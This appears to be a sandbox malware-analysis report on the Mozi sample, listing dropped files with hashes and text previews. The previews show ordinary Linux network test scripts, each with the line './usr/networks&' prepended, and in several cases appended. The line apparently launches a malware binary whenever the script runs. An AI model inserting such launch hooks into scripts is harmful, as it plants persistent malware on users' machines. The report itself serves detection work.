                                                              SHA-512:D66A46C098F6A6D08B904D2A7EDFCCF1E3622C1BD1FAA010578C33444B7C49A7D86A3197BBA32DE98683AFC2CDE7BD67357C2E00BA7DA2FBEDDEC9D3815A4073
                                                              Malicious:false
                                                              Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...[ "$VERBOSE" = "1" ] && echo.}..run_cmd().{..local cmd="$*"..local out..local rc...if [ "$VERBOSE" = "1" ]; then...echo "COMMAND: $cmd"..fi...out=$(eval $cmd 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo "$out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..################################################################################.# config..create_ns().{..local ns=${1}...ip netns del ${ns} 2>/dev/null...ip netns add ${ns}..ip -netns ${ns} addr add 127.0.0.1/8 dev lo..ip -netns ${ns} link set lo up...ip netns exec ${ns} sysctl -q -w net.ipv6.conf.all.keep_addr_on_down=1..case ${ns} in..h*)...ip netns exec $ns sysctl -q -w net.ipv6.conf.all.forwarding=0...;;..r*)...ip netns exec $ns sysctl -q -w net.ipv4.ip_forward=1...ip netns exec $ns sysctl -q -w net.ipv6.conf.all.forwarding=1...;;..esac.}..setup().{..local ns..local i...#set -e...for ns in h0 r1 h1 h2 h3..do...create_ns ${ns}..done...#..# create interc
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):30358
                                                              Entropy (8bit):5.149225654380326
                                                              Encrypted:false
                                                              SSDEEP:768:Yc/Gl3JcQwm5jmA+Yfd+tdUaGPVkcnPJ5qmd+ZnJY/b7Bf7hMehv5cRTbicH3d:YciyIj5BnO3d
                                                              MD5:A5578A1F1D8156012B4F6A0F1A620383
                                                              SHA1:D04ABFB2D2B5DF70BB011BFF87D48F07BC81BDB9
                                                              SHA-256:0BBA5B1308425F707409D81F17052E2724A05DE82BA72D4C43BE74214306C244
                                                              SHA-512:C84CCF52747762F97B9A328271BF183B7BF9CF3809D9727ED6570F79E6962B4C0055919E65CD3D041501AED2F053135A38CC6BA8CE26EF4F016E69BFFCC639C8
                                                              Malicious:false
                                                              Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...if [ "${PAUSE}" = "yes" ]; then...echo...echo "hit enter to continue, 'q' to quit"...read a...[ "$a" = "q" ] && exit 1..fi...[ "$VERBOSE" = "1" ] && echo.}..run_cmd().{..local cmd="$1"..local out..local stderr="2>/dev/null"...if [ "$VERBOSE" = "1" ]; then...printf "COMMAND: $cmd\n"...stderr=..fi...out=$(eval $cmd $stderr)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo " $out"..fi...return $rc.}..get_linklocal().{..local dev=$1..local ns..local addr...[ -n "$2" ] && ns="-netns $2"..addr=$(ip $ns -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..create_ns().{..local n=${1}...ip netns del ${n} 2>/dev/null...set -e..ip netns add ${n}..ip netns set ${n} $((nsid++))..ip -netns ${n} addr add 127.0.0.1/8 dev lo..ip -netns ${n} link set lo up...ip netns exec ${n} sysctl -qw net.ipv4.ip_forw
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5253
                                                              Entropy (8bit):5.126957311810008
                                                              Encrypted:false
                                                              SSDEEP:96:gNHKMcy4LOgbCQgdqvcY25tOdSg1cgoirS3sJ/7:0TVXKc1DOdHT
                                                              MD5:4BB9EDAA670B1D47E0EC11BE4B08E4DE
                                                              SHA1:46D0CD00582D9B173A126C54088E2C5B196517E4
                                                              SHA-256:5CB74C5B7C9F001C056C13B2C3E4630AF06BFC1D913A0C4AF8DE8DCF67BC4D54
                                                              SHA-512:C849D92A643332819FB9AA4040418A00F5D28F0BC91EF1605C36822BA4675E2FE374D13681772726B78C01248002050750A140B2E6FB767B6AB65F8A517F65D5
                                                              Malicious:false
                                                              Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..log_section().{..echo..echo "######################################################################"..echo "TEST SECTION: $*"..echo "######################################################################".}..setup().{..set -e..ip netns add testns..$IP link set dev lo up...$IP link add dummy0 type dummy..$IP link set dev dummy0 up..$IP address add $DEV_ADDR/24 dev dummy0..$IP -6 address add $DEV_ADDR6/64 dev dummy0...ip netns exec testns sysctl -w net.ipv4.ip_forward=1...set +e.}..cleanup().{..$IP link del dev dummy0 &> /dev/null..ip netns del testns.}..fib_check_iproute_support().{..ip rule help 2>&1 | grep -q $1..if [ $? -ne 0 ]; then...echo "SKIP: iproute2 iprule too old, missing $1 match"...return 1..fi...ip route get help 2>&1 | grep -q $2..if [ $? -ne 0 ]; then...echo "SKIP: iproute2 get route too old, missing $2 match"...return 1..fi...return 0.}..fib_rule6_del().{..$IP -6 rule del $1..log_test $? 0 "rule6 del $1".}..fib_rul
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):46643
                                                              Entropy (8bit):5.263617494795865
                                                              Encrypted:false
                                                              SSDEEP:384:DDi8S2/plzp/TGatEWrT5MZHwkIHTsjPhESASVzinGn52NOx9LIFnkxPJEouSGS3:3TS2/pld/TZn5MZ0NnGn52CMe5moFVt
                                                              MD5:141675E73A6FF4B0DB5517E32B2C937F
                                                              SHA1:4435B3658279F13DB9398EB099E4ED8BDA6A3B92
                                                              SHA-256:C37270657F24ECCCE102B62A059BB54DA0E0AD42F65AAB7DC200E0FA8ACD0E04
                                                              SHA-512:80A7072F287174993DEC83302550ABED16EC59EB287A6E302A8DA67FE0CA1B9F80474DD466D1889BC9A21761E730FF82B1C08D3EB196E1C71F8315C849B53E66
                                                              Malicious:false
                                                              Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...if [ "${PAUSE}" = "yes" ]; then...echo...echo "hit enter to continue, 'q' to quit"...read a...[ "$a" = "q" ] && exit 1..fi.}..setup().{..set -e..ip netns add ns1..ip netns set ns1 auto..$IP link set dev lo up..ip netns exec ns1 sysctl -qw net.ipv4.ip_forward=1..ip netns exec ns1 sysctl -qw net.ipv6.conf.all.forwarding=1...$IP link add dummy0 type dummy..$IP link set dev dummy0 up..$IP address add 198.51.100.1/24 dev dummy0..$IP -6 address add 2001:db8:1::1/64 dev dummy0..set +e..}..cleanup().{..$IP link del dev dummy0 &> /dev/null..ip netns del ns1..ip netns del ns2 &> /dev/null.}..get_linklocal().{..local dev=$1..local addr...addr=$($IP -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..fib_unreg_unicast_test().{..echo..echo "Single path route test"...setup...echo " Start point"..$IP route ge
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):7257
                                                              Entropy (8bit):5.29120251291897
                                                              Encrypted:false
                                                              SSDEEP:192:b93vnWMdBXmlHwYLHqiJ5a0fB4w5DBmKsJ+9qb4Nx4oQDW4T:pfTdBXmlHwYLKilVhsJ+kMhY
                                                              MD5:9BFA82C4B02F53428ED7167F9F56A2A1
                                                              SHA1:5DC8640CCA18426FC7359A0764AD13C3F6DA8432
                                                              SHA-256:C49AC671BB80966BCDAE01B0746826AB5DC07EB427A3CF45103D409D3E241942
                                                              SHA-512:1BA3BC90A1BD945ECA85172E50E980F7945EDC030FB0139172A1A49435C4B24DE8941B93623277EDD42AE139A67DB6336970812F348B8646EBA6EA60C8A687B7
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi..if [[ "$(echo $DEVLINK_DEV | grep -c pci)" -eq 0 ]]; then...echo "SKIP: devlink device's bus is not PCI"...exit 1..fi...DEVLINK_VIDDID=$(lspci -s $(echo $DEVLINK_DEV | cut -d"/" -f2) \.... -n | cut -d" " -f3).fi..##############################################################################.# Sanity checks..devlink help 2>&1 | grep resource &> /dev/null.if [ $? -ne 0 ]; then..echo "SKIP: iproute2 too old, missing devlink resource support"..exit 1.fi..devlink help 2>&1 | grep trap &> /dev/null.if [ $? -ne 0 ]; then..echo "SKIP: iproute2 too old, missing devlink trap support"..exit 1.fi..##############################################################################.# Devlink helpers..devlink_resource_names_to_path().{..local resource..local path=""...for resource in "${@}"; do...if [ "$path" == "" ]; then....path="$resource"...else....path="${path}/$resource"...fi..done...echo "$path".}..devlink_resource_get().{..local name=$1..local resource_name=.[][\"$DEV
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):18782
                                                              Entropy (8bit):5.235983173566899
                                                              Encrypted:false
                                                              SSDEEP:192:WjE48X8gWbotdJrGMNlV1JG8IHpfLwFWpzvwdGU7r/tkTVQj8uFOmCyip1k54eDY:94PeyLwFWpcEU74VQR4e71i
                                                              MD5:33D5377637217EAE06E98E33FC04B188
                                                              SHA1:59C6E042FAA5A655305E0C8A0CE83EDAAF0F8D7B
                                                              SHA-256:8310B79376659E0CCAA87FF0BA252CA3F8A944504EAE0CDE638654B6403EF517
                                                              SHA-512:FFDC2D40A04DE6FDAF756CE983EC57986F12FF70600CC560A7F257849ABB0D35C6C8D71C0582EE9E36AF8F94C166F3315775F40529320E568818216BDDCB1C0A
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi.}..check_tc_shblock_support().{..tc filter help 2>&1 | grep block &> /dev/null..if [[ $? -ne 0 ]]; then...echo "SKIP: iproute2 too old; tc is missing shared block support"...exit 1..fi.}..check_tc_chain_support().{..tc help 2>&1|grep chain &> /dev/null..if [[ $? -ne 0 ]]; then...echo "SKIP: iproute2 too old; tc is missing chain support"...exit 1..fi.}..if [[ "$(id -u)" -ne 0 ]]; then..echo "SKIP: need root privileges"..exit 0.fi..if [[ "$CHECK_TC" = "yes" ]]; then..check_tc_version.fi..require_command().{..local cmd=$1; shift...if [[ ! -x "$(command -v "$cmd")" ]]; then...echo "SKIP: $cmd not installed"...exit 1..fi.}..require_command jq.require_command $MZ..if [[ ! -v NUM_NETIFS ]]; then..echo "SKIP: importer does not define \"NUM_NETIFS\""..exit 1.fi..##############################################################################.# Command line options handling..count=0..while [[ $# -gt 0 ]]; do..if [[ "$count" -eq "0" ]]; then...unset NETIFS...declare -A
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):205
                                                              Entropy (8bit):4.7396662996751076
                                                              Encrypted:false
                                                              SSDEEP:3:qXVPnKWoW6MKH57FrLQVG6xRXt6XXHBEkVAv6VFedQVLpvyoYxvMRvOWvQLk9bJT:cnKWcP4NRX2ykiv+YdQfUx1gxJjWMn
                                                              MD5:638F9D3F209476CE9B175236635D4DB8
                                                              SHA1:B9A3FCA663B97909DCDEABA1DCF9259AB2E77E29
                                                              SHA-256:AF4CB5CF32617176768E4A6E6C6CF986BA074EFA1125DAF25630321CAF468938
                                                              SHA-512:176FB4049BFEBE70A2FA8FEA09F0A0F0DB258AD711AB93FFACCF51B4B9ECC3CA386A626B8B876281230C3A4F4E767E391B18B755B70B0CAC85CA222E02FD58FE
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit $ksft_skip..fi.}..cleanup().{..pre_cleanup...h2_destroy..h1_destroy...vrf_cleanup.}..trap cleanup EXIT..setup_prepare.setup_wait..tests_run..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
